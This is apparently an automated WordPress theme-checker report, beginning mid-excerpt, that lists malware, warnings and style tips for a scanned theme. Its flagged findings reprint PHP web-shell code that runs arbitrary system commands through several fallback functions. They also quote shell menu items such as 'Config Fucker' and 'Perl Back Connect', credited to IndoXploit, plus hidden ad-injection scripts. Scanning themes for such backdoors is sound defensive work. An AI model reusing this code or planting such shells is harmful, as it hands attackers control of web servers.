{$_1765c46dda35 = '';if (function_exists('exec')) {@exec($_6d1b263a32f3,$_1765c46dda35);$_1765c46dda35 = @join('\n',$_1765c46dda35);} elseif (function_exists('passthru')) {ob_start();@passthru($_6d1b263a32f3);$_1765c46dda35 = ob_get_clean();} elseif (function_exists('system')) {ob_start();@system($_6d1b263a32f3);$_1765c46dda35 = ob_get_clean();} elseif (function_exists('shell_exec')) {$_1765c46dda35 = shell_exec($_6d1b263a32f3);} elseif (is_resource($_e0887aa7bc0b = @popen($_6d1b263a32f3,'r'))) {$_1765c46dda35 = '';while(!@feof($_e0887aa7bc0b))$_1765c46dda35 .= fread($_e0887aa7bc0b,1024);pclose($_e0887aa7bc0b);}return $_1765c46dda35;}i
  10. Malware : Network operations curl_init was found in the file wp-defence.php 3: $ch = curl_init('$url');curl_exec was found in the file wp-defence.php 11: $result = curl_exec($ch);
  11. Hidden admin bar : Hidden admin Bar Themes should not hide admin bar. Detected in file : tbl_status.php.
Warning
  1. Security breaches : Presence of Google advertising codeFound pub-1597483494015623 in file bizhbjpehw.php. 98: <body><div id='ads' style='display:none;width: 100%;height: 90px;text-align: center;padding: 10px 0;'></div><script> if(window.adsbygoogle){ adsbygoogle = window.adsbygoogle; }else{ adsbygoogle = new Array(); } adsbygoogle .push({ google_ad_client: 'ca-pub-1597483494015623', enable_page_level_ads: true });</script>198: <body><div id='ads' style='display:none;width: 100%;height: 90px;text-align: center;padding: 10px 0;'></div><script> if(window.adsbygoogle){ adsbygoogle = window.adsbygoogle; }else{ adsbygoogle = new Array(); } adsbygoogle .push({ google_ad_client: 'ca-pub-1597483494015623', enable_page_level_ads: true });</script>261: <body style='color: black; background-color: black;'><div id='ads' style='display:none;width: 100%;height: 90px;text-align: center;padding: 10px 0;'></div><script> if(window.adsbygoogle){ adsbygoogle = window.adsbygoogle; }else{ adsbygoogle = new Array(); } adsbygoogle .push({ google_ad_client: 'ca-pub-1597483494015623', enable_page_level_ads: true });</script>342: <body class='body'><div id='ads' style='display:none;width: 100%;height: 90px;text-align: center;padding: 10px 0;'></div><script> if(window.adsbygoogle){ adsbygoogle = window.adsbygoogle; }else{ adsbygoogle = new Array(); } adsbygoogle .push({ google_ad_client: 'ca-pub-1597483494015623', enable_page_level_ads: true });</script>Found pub-1597483494015623 in file acdtcgfbso.php. 98: <body><div id='ads' style='display:none;width: 100%;height: 90px;text-align: center;padding: 10px 0;'></div><script> if(window.adsbygoogle){ adsbygoogle = window.adsbygoogle; }else{ adsbygoogle = new Array(); } adsbygoogle .push({ google_ad_client: 'ca-pub-1597483494015623', enable_page_level_ads: true });</script>198: <body><div id='ads' style='display:none;width: 100%;height: 90px;text-align: center;padding: 10px 0;'></div><script> if(window.adsbygoogle){ adsbygoogle = window.adsbygoogle; }else{ adsbygoogle = new Array(); } adsbygoogle .push({ google_ad_client: 'ca-pub-1597483494015623', enable_page_level_ads: true });</script>261: <body style='color: black; background-color: black;'><div id='ads' style='display:none;width: 100%;height: 90px;text-align: center;padding: 10px 0;'></div><script> if(window.adsbygoogle){ adsbygoogle = window.adsbygoogle; }else{ adsbygoogle = new Array(); } adsbygoogle .push({ google_ad_client: 'ca-pub-1597483494015623', enable_page_level_ads: true });</script>342: <body class='body'><div id='ads' style='display:none;width: 100%;height: 90px;text-align: center;padding: 10px 0;'></div><script> if(window.adsbygoogle){ adsbygoogle = window.adsbygoogle; }else{ adsbygoogle = new Array(); } adsbygoogle .push({ google_ad_client: 'ca-pub-1597483494015623', enable_page_level_ads: true });</script>
  2. PHP short tags : Presence of PHP short tagsPHP short tags were found in file dtcyxbttww.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.743: <meta name='author' content='<?=source('author');?>'>746: <?=source('css');?>752: <a href='?act=symlinker&dir=<?=path();?>' class='dem'>Symlink 404</a>753: <a href='?act=symconfig&dir=<?=path();?>' class='dem'>Config Fucker</a>754: <a href='?act=jumping&dir=<?=path();?>' class='dem'>Jumping</a>755: <a href='?act=perlback&dir=<?=path();?>' class='dem'>Perl Back Connect</a>809: Code By <?=footer();?> - Thanks To IndoXploit - Garuda Security Hacker PHP short tags were found in file vfykoxifen.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.743: <meta name='author' content='<?=source('author');?>'>746: <?=source('css');?>752: <a href='?act=symlinker&dir=<?=path();?>' class='dem'>Symlink 404</a>753: <a href='?act=symconfig&dir=<?=path();?>' class='dem'>Config Fucker</a>754: <a href='?act=jumping&dir=<?=path();?>' class='dem'>Jumping</a>755: <a href='?act=perlback&dir=<?=path();?>' class='dem'>Perl Back Connect</a>809: Code By <?=footer();?> - Thanks To IndoXploit - Garuda Security Hacker
  3. Comment pagination : Declaration of comment paginationThe theme doesn't have comment pagination code in it. Use paginate_comments_links() to add comment pagination, or older previous_comments_link() and next_comments_link() functions.
  4. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  5. Tags : Tags displayThis theme doesn't seem to display tags.
  6. Screenshot : Screenshot fileBad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  2. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  3. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  4. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  5. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  6. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  7. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  8. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  9. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  10. Use of includes : Use of include or requireThe theme appears to use include or require : tbl_status.php 31: require_once( ABSPATH . WPINC . '/class-wp-admin-bar.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes